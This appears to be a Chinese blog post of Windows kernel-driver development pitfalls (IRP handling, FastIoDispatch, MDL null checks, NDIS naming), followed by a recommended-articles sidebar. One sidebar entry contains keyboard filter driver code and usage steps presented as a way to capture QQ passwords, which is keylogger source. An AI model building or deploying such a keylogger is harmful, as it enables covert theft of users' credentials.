驱动开发坑总结

最新推荐文章于 2023-11-05 23:19:37 发布
原创 最新推荐文章于 2023-11-05 23:19:37 发布 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

1. 用FILE_FLAG_OVERLAPPED打开设备时,ReadFile、WriteFile的OVERLAP参数不能为空,否则会异常,到不了驱动的派遣函数

2. 用IoGetDeviceObjectPointer得到FILE_OBJECT和DEVICE_OBJECT指针,用完后Deref文件对象就行了,设备对象千万别Deref,否则会损坏设备对象。他内部是ZwOpenFile再ObRefrenceObjectByHandle来得到FILE_OBJECT指针,再用它的成员得到DEVICE_OBJECT指针的,所以DEVICE_OBJECT不要deref

3. IoDriverObjectType,这个未公开的变量可以声明一下就用,但在vista以前是POBJECT_TYPE类型,后面变成了POBJECT_TYPE*类型。在ObRefrenceObjectByName等函数中要注意

4. 文件系统驱动或者过滤驱动,一定要实现FastIoDispatch,哪怕函数里面直接返回false也可以。楚狂人和wowocook的书里说不实现也可以,但自己试不实现的确会蓝屏,从wrk的代码里看,NtReadFile、NtWriteFile等确实会直接调用FastIoDispatch

    if (fileObject->PrivateCacheMap) {
            IO_STATUS_BLOCK localIoStatus;
            ASSERT(fastIoDispatch && fastIoDispatch->FastIoRead);
            //
            //  Negative file offsets are illegal.
            //
            if (fileOffset.HighPart < 0) {
                if (eventObject) {
                    ObDereferenceObject( eventObject );
                }
                IopReleaseFileObjectLock( fileObject );
                ObDereferenceObject( fileObject );
                return STATUS_INVALID_PARAMETER;
            }
            if (fastIoDispatch->FastIoRead( fileObject,
                                            &fileOffset,
                                            Length,
                                            TRUE,
                                            keyValue,
                                            Buffer,
                                            &localIoStatus,
                                            deviceObject )

5.  pIrp->MdlAddress) 引发的蓝屏

PUCHAR pBuf = NULL;
if(pDeviceObject->Flags & DO_BUFFERED_IO)
pBuf = (PUCHAR)(pIrp->AssociatedIrp.SystemBuffer);
else if((pDeviceObject->Flags & DO_DIRECT_IO) )
pBuf = (PUCHAR)(MmGetSystemAddressForMdlSafe(pIrp->MdlAddress,NormalPagePriority));

很普通的一段代码却蓝屏了,看蓝屏代码是0xd1,DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an interrupt request level (IRQL) that is too high.  This is usually
caused by drivers using improper addresses.If kernel debugger is available get stack backtrace.

后来才发现是pIrp->MdlAddress为空,MmGetSystemAddressForMdlSafe里的一行代码, 

mov     rcx, [rbx+8]    ; MemoryDescriptorList
test    byte ptr [rcx+0Ah], 5

这里rcx为0,变成违例了,难道用户传过来的buffer为空? 改了下代码

else if((pDeviceObject->Flags & DO_DIRECT_IO) && pIrp->MdlAddress)//pIrp->MdlAddress为空时,MmGetSystemAddressForMdlSafe会引发蓝屏

这样就ok了


6. IoFreeIrp这个函数在内部是会完成irp的,所以用IoBuildAsynchronousFsdRequest 等函数创建的irp,用完后直接free就行了,不要再去complete了


7. Ndis协议驱动,inf里面写的服务名和PROTOCOL_CHARACTERISTICS里的ProtocolName要匹配,否则注册协议能成功但不会被系统回调。(坑死寡人了。。)


块设备驱动开发常见问题与解决方案汇总
操作系统内核探秘的博客
05-23 816
本文面向刚接触块设备驱动开发的工程师,以及遇到具体问题需要排查的中级开发者。覆盖从驱动初始化到IO请求处理的全流程常见问题,重点解决“设备识别失败”“IO请求丢失”“性能瓶颈”等高频问题。本文通过“故事引入→核心概念→问题分类→实战示例→工具推荐”的结构展开,先通过小明开发驱动的故事引出问题,再用生活比喻解释块设备核心组件,接着分场景解析问题,最后用虚拟驱动示例演示解决方案。gendisk:设备的“信息看板”,记录容量、操作函数等;请求队列:管理IO任务的“分拣中心”,支持合并和调度;bio。
数据驱动下的用户画像系统:从0到1的技术实战与避指南
最新发布
专注数据驱动领域原创分享。拆解从数据采集、建模分析到业务价值落地的全链路实践,聊决策逻辑、技术工具与场景案例。用通俗语言讲透数据如何赋能业务,与同路人共探数据价值。
09-22 1332
本文系统阐述了数据驱动型用户画像系统的构建逻辑,提出"三层两支撑"架构体系(数据层、处理层、应用层+元数据管理与监控告警),并详细拆解了从需求对齐到测试上线的七阶段开发流程。核心技术选型强调"业务适配优先",建议分层存储策略(Hive/HBase/MySQL/ES协同)和计算引擎组合(离线批处理+实时流处理)。关键实践包括:数据源头治理、标签开发方法论、工程化保障体系,避免常见误区如盲目追求全实时、忽视数据质量评估等,为不同规模企业提供可落地的用户画像建设方案。
关于IoGetDeviceObjectPointer函数
danxuezx的专栏
06-14 2408
关于IoGetDeviceObjectPointer函数
IoGetDeviceObjectPointer和ObReferenceObjectByName得到设备对象指针
125096
02-19 1260
//IoGetDeviceObjectPointer得到设备对象指针 UNICODE_STRING DeviceName; RtlInitUnicodeString(&DeviceName,L"\\Device\\MyDDKDeviceA"); PDEVICE_OBJECT DeviceObject=NULL; PFILE_OBJECT FileObject=NULL; NTSTATUS ntS
IoGetDeviceObjectPointer
zacklin的专栏
04-16 6543
从名字获得设备对象 在知道一个设备名字的情况下,使用函数IoGetDeviceObjectPointer可以获得这个设备对象的指针。这个函数的原型如下: NTSTATUS IoGetDeviceObjectPointer( IN PUNICODE_STRING  ObjectName, IN ACCESS_MASK  DesiredAccess, OUT PFILE_OBJE
利用IoDriverObjectType控制内核驱动加载
weixin_60043341的博客
08-17 550
在edr或者其他类型的安全软件我们通常要监测当前系统的内核驱动的加载通常使用的方法是PsSetLoadImageNotifyRoutine设置模块加载回调例程来监控ring3模块以及ring0模块的加载,回调函数 eLoadImageNotifyRoutine 的第二个参数判断,如果 PID是0 ,则表示加载驱动,如果PID非零,则表示加载DLL。缺点当然也就是函数太底层,第二就是方法太通用几乎做过进程、线程监控的搞安全内核开发的人基本都晓得,也很容易被发现而且也会被摘链,而失效。...
windows驱动之踩之旅
even的博客
12-08 552
2018/12/8  写读驱动练手 设备名定义出错,导致使用DriverMonitor时加载失败,报error(3)  正确定义:\\Device\\xxx 注意格式,前面不能打错,xxx为设备名称    卸载驱动例程发生蓝屏 引用了空指针 read例程里使用RtlFillMemory导致蓝屏,它和memset参数shun顺序不一致...
使用命名管道的OVERLAPPED方式实现非阻塞模式编程
jiangdf的专栏
06-20 1万+
命令管道是进程间通讯的一种常用方式,对于命令管道的介绍可以参考别的资料和书籍,这里推荐一个《VC++下命名管道编程的原理及实现》这篇博文,写得比较清楚。但是都是介绍了阻塞模式的编程,我这里主要是介绍利用命令管道OVERLAPPED方式使用非阻塞模式编程。注:文中使用的方法就是函数的意思。 参考MSDN,服务器端创建命令管道(使用CreateNamedPipe方法),不使用FILE_FLAG_OV
管道实现进程间通讯 、WaitNamedPipe
热门推荐
chenyujing1234的专栏
10-22 1万+
一、管道实现进程间通讯 基本的理论知识   1.什么是管道以及分类   管道是两个头的东西,每个头各连接一个进程或者同一个进程的不同代码,按照管道的类别分有两种管道,匿名的和命名的;按照管道的传输方向分也可以分成两种,单向的双向的。根据管道的特点,命名管道通常用在网络环境下不同计算机上运行的进程之间的通信(当然也可以用在同一台机的不同进程中)它可以是单向或双向的;而匿名管道只能用在同一台计算
正点原子嵌入式linux驱动开发——Linux WIFI驱动
xhj12138的博客
11-05 3088
正点原子linux驱动开发的学习笔记,这一篇是WIFI驱动
【老设备驱动开发血泪史】:MZ-N910驱动开发必须知道的9大陷阱(亲测避
文章从硬件与操作系统交互机制出发,深入分析了驱动模型差异、内存管理误区及并发控制问题,并结合开发实践,总结了初始化流程、中断处理、错误恢复等关键环节的避方法。同时,文章探讨了性能调优、日志管理与兼容...
QQ密码记录程序
05-15
http://blog.youkuaiyun.com/xiaoxiao108/article/details/7563159 最近看了看c++,写个程序玩玩。因为用户态代码不好截取到qq密码,写个键盘分层驱动。试了试效果还可以。 开发环境 vs2008 winddk ddkwizard windowsxp Dbgview 实现方法 1.把过滤驱动挂载到键盘驱动上面 2.设置完成例程 3.通过KdPrint输出键盘扫描码到DebugView 4. 从DebugView的日志文件中读出键盘按键。 具体代码 1.把过滤驱动挂载到KeyBoardClass0上面 PFILE_OBJECT fileOjbect; PDEVICE_OBJECT deviceObject; UNICODE_STRING deviceName; PDEVICE_EXTENSION pdx; PDEVICE_OBJECT filterDeviceObject; PDEVICE_OBJECT targetDevice; fileOjbect=NULL; RtlInitUnicodeString(&deviceName;,L"\\Device\\KeyBoardClass0"); status=IoGetDeviceObjectPointer(&deviceName;,FILE_ALL_ACCESS,&fileOjbect;,&deviceObject;); pdoDeviceObj->Flags |= DO_BUFFERED_IO; pdx=(PDEVICE_EXTENSION)pdoDeviceObj->DeviceExtension; pdx->pDevice=pdoDeviceObj; pdx->ustrDeviceName=usDeviceName; filterDeviceObject=((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->pDevice; targetDevice=IoAttachDeviceToDeviceStack(filterDeviceObject,deviceObject); ((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->TargetDevice=targetDevice; filterDeviceObject->DeviceType=targetDevice->DeviceType; filterDeviceObject->Characteristics=targetDevice->Characteristics; filterDeviceObject->Flags&=~DO_DEVICE_INITIALIZING; filterDeviceObject->Flags|=(targetDevice->Flags&(DO_DIRECT_IO|DO_BUFFERED_IO)); ObDereferenceObject(fileOjbect); return STATUS_SUCCESS; 2.设置完成例程 PDEVICE_EXTENSION pdx; pdx=(PDEVICE_EXTENSION)DeviceObject->DeviceExtension; IoCopyCurrentIrpStackLocationToNext(Irp); IoSetCompletionRoutine(Irp,MyIoCompletion,NULL,TRUE,TRUE,TRUE); NTSTATUS status=IoCallDriver(pdx->TargetDevice,Irp); return status; 3.输出键盘按键的扫描码 NTSTATUS MyIoCompletion(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context) { if(NT_SUCCESS(Irp->IoStatus.Status)) { PKEYBOARD_INPUT_DATA keys = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer; if(keys->Flags==0x0001||keys->Flags==0x0003) KdPrint(("x",keys->MakeCode)); } if(Irp->PendingReturned) { IoMarkIrpPending(Irp); } return STATUS_SUCCESS; } 使用步骤 1.安装驱动 用DriverMonitor加载并运行Driver1.sys驱动文件 2.打开Dbgview,当按键时就可以看到dbgview中记录下的键盘扫描码 3.在dbgview中选择记录日志文件,处理下日志文件就可以得到qq密码了。 偶c语言菜鸟,欢迎大神们批评教育 不足的地方很多啊 多多交流 谢谢 邮箱328452421@qq.com http://blog.youkuaiyun.com/xiaoxiao108/article/details/7563159
基于uni-app实现的聊天界面开发点总结
它涵盖了 scroll-view 使用技巧、屏幕适配方案、页面滚动控制、跨平台兼容性处理、以及从前端传统开发模式向现代框架迁移的经验总结。这些知识点对于正在学习或使用 uni-app 进行多端开发的工程师具有重要的参考价值...
Qt实现Windows文件实时监控
qq_31629063的博客
09-04 1774
FileSystemWatcher.h #pragma once #pragma execution_character_set("utf-8") #include <Windows.h> #include <QThread> //观察者线程声明 class WatcherThread; /* * @class FileSystemWatcher,文件系统观察者 */ class FileSystemWatcher : public QObject { Q_OBJECT
KbdClass键盘过滤驱动以及书中几处错误
Sven的忘却日记
11-20 1987
《寒江独钓》这本书中的键盘过滤驱动例子中,照着书上的例子抄完,代码有些错误的地方! 书上的例子有3处错误,分别如下: 1)对象类型声明错误 extern POBJECT_TYPE IoDriverObjectType; 修改为以下正确方式 extern POBJECT_TYPE *IoDriverObjectType; 在使用的*IoDriverObjectType地方,也需要修改成正确的方式...
8.2.1 找到所有的键盘设备
张昆
12-12 594
找到所有的键盘设备 先打开驱动对象KbdClass,然后绑定它下面的所有设备
Windows 驱动开发 新手入门(四)
Doub1's Blog
06-21 2694
本篇文章介绍一下设备对象,这是写驱动过滤的基础,比如键盘,串口等等的过滤。是的缩写,直译就是物理设备对象,一般来说,就是在就是的设备对象。 只能返回设备对象地址。 指向包含 Unicode 字符串的缓冲区的指针,该字符串是设备对象的名称。 指定表示所需访问的。 通常 ,DesiredAccess指定FILE_READ_DATA。 不经常指定FILE_WRITE_DATA或FILE_ALL_ACCESS访问权限。 指向表示相应设备对象到用户模式代码的文件对象的指针(如果调用成功)。 指向表示命名逻辑、虚
《Windows驱动开发技术详解》之驱动程序调用驱动程序——通过设备指针调用其他驱动程序...
weixin_30700099的博客
06-16 322
本节介绍“手动”构造各个IRP,然后将IRP传递到相应驱动程序的派遣函数里。 获得设备指针 每个内核中的句柄都会和一个内核对象的指针联系起来。ZwCreateFile内核函数可以通过设备名打开设备句柄,这个设备句柄和一个文件对象的指针关联。IoGetDeviceObjectPointer内核函数可以通过设备名获得文件对象指针,而不是获得设备句柄。当调用IoGetDeviceO...
linux驱动开发学习路线
02-27
<think>嗯,用户想了解Linux驱动开发的学习路线,我得好好理清楚思路。首先,用户可能是刚开始接触Linux驱动开发,或者是已经有了一些编程基础,想转行到这个领域。需要从基础开始讲起,逐步深入,确保他能跟上。 首先,Linux驱动开发需要哪些基础知识呢?操作系统原理、C语言应该是必须的。可能还需要了解一些硬件相关的知识,比如处理器架构、内存管理之类的。我得先列出这些基础知识,让用户打好基础。 然后,Linux系统本身的了解也很重要。比如内核的组成、模块化机制,还有编译和调试的方法。用户可能需要学习如何编译内核,如何编写简单的模块,这部分可以通过一些例子来讲解,比如经典的Hello World模块。 接下来是驱动开发的核心部分,字符设备、平台设备、设备树这些概念。用户需要理解这些驱动类型的工作原理,以及如何实际操作。比如,如何注册字符设备,如何使用设备树来描述硬件。这部分可能需要结合代码示例,但用户现在可能还不需要写代码,所以先解释概念。 另外,同步与互斥机制、中断处理、DMA这些高级主题也是必须的。用户可能会遇到多线程环境下的资源竞争问题,或者需要处理硬件中断,这些都需要详细说明。不过要分阶段,先掌握基础再深入高级内容。 调试和优化技巧也很关键,没有这些在实际开发中会遇到很多困难。比如如何使用printk和动态调试,还有性能优化的方法。用户需要知道如何排查问题,提高驱动效率。 最后,推荐一些学习资源和项目实践,帮助用户巩固知识。书籍、在线文档、社区论坛都是不错的资源。实际项目比如LED驱动、传感器驱动,能让他动手实践,加深理解。 可能用户还想知道学习的大致时间安排,或者有哪些常见的陷阱需要避免。不过目前的问题主要是学习路线,所以先按步骤来,确保每个阶段都有明确的目标和内容。还要注意语言要口语化,避免太技术化的术语,让用户容易理解。 总之,结构应该是先基础,再系统学习,然后核心开发,高级主题,最后调试和项目实践。这样用户能循序渐进,逐步掌握Linux驱动开发的各个方面。需要检查是否有遗漏的重要知识点,比如设备树现在在嵌入式系统中很常用,必须涵盖进去。另外,驱动模型和sysfs这类用户空间接口也很重要,应该提到。</think>Linux驱动开发学习路线可以分为以下阶段,结合理论与实践逐步深入: --- ### **一、基础准备阶段(1-3个月)** 1. **C语言基础** - 重点掌握:指针、结构体、内存管理(malloc/free)、位操作、函数指针 - 推荐书籍:《C和指针》《C Primer Plus》 2. **操作系统原理** - 理解进程/线程、内存管理、中断、I/O机制、内核态与用户态 - 推荐学习:《操作系统导论》《深入理解计算机系统》 3. **Linux系统基础** - 熟练使用Linux命令行(gcc/gdb/makefile) - 掌握Shell脚本编写 - 学习内核源码目录结构(如`drivers/`, `include/`, `arch/`) --- ### **二、Linux内核入门(2-4个月)** 1. **内核编译与模块开发** - 实践内核编译(配置选项、交叉编译) - 编写第一个内核模块(Hello World) - 学习模块加载/卸载(`insmod/rmmod`) 2. **内核关键机制** - 理解系统调用、Proc文件系统、Sysfs - 掌握内核日志(`printk`)与动态调试(`dmesg`) 3. **设备驱动模型** - 学习字符设备驱动(`cdev`)、平台设备驱动(`platform_device/platform_driver`) - 掌握设备树(Device Tree)语法与使用 --- ### **三、驱动开发核心(3-6个月)** 1. **硬件交互基础** - 内存映射(`ioremap`)、寄存器操作、GPIO控制 - 中断处理(`request_irq`)、延时机制(`mdelay`) 2. **典型驱动开发** - **字符设备**:按键、LED、ADC - **块设备**:RAMDisk模拟 - **网络设备**:虚拟网卡驱动 - **输入子系统**:触摸屏、键盘驱动 3. **同步与并发** - 自旋锁(`spinlock`)、互斥锁(`mutex`)、信号量(`semaphore`) - 原子操作(`atomic_t`)、等待队列(`wait_queue`) --- ### **四、进阶技术(3-6个月)** 1. **内核调试与优化** - 使用`ftrace`、`kprobe`分析性能 - 内存泄漏检测(`kmemleak`)、死锁排查 2. **高级驱动技术** - DMA传输(`dma_alloc_coherent`) - 内核线程(`kthread`)、工作队列(`workqueue`) - 电源管理(`PM Framework`) 3. **实战项目** - 实现SPI/I2C设备驱动(如传感器) - 开发USB摄像头驱动(结合V4L2框架) - 移植开源驱动(如WiFi模块) --- ### **五、学习资源推荐** 1. **书籍** - 《Linux设备驱动程序》(经典必读) - 《Linux内核设计与实现》 - 《精通Linux设备驱动程序开发》 2. **在线文档** - 内核文档(`Documentation/`目录) - [Linux Kernel Module Programming Guide](https://tldp.org/LDP/lkmpg/2.6/html/) 3. **社区与工具** - 订阅[LKML](https://lore.kernel.org/)邮件列表 - 使用QEMU模拟器调试驱动 - 参与开源项目(如Raspberry Pi驱动开发) --- ### **六、避指南** 1. **硬件依赖问题**:优先选择支持良好的开发板(如树莓派、BeagleBone)。 2. **内核版本兼容性**:注意API变化(如`register_chrdev` vs `cdev_init`)。 3. **调试技巧**:善用`CONFIG_DEBUG_KERNEL`和`objdump`反汇编。 --- **学习路线总结**: 基础 → 内核机制 → 驱动开发 → 调试优化 → 项目实战 建议每天投入2-3小时,配合开发板实践,1年左右可达到中级水平。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值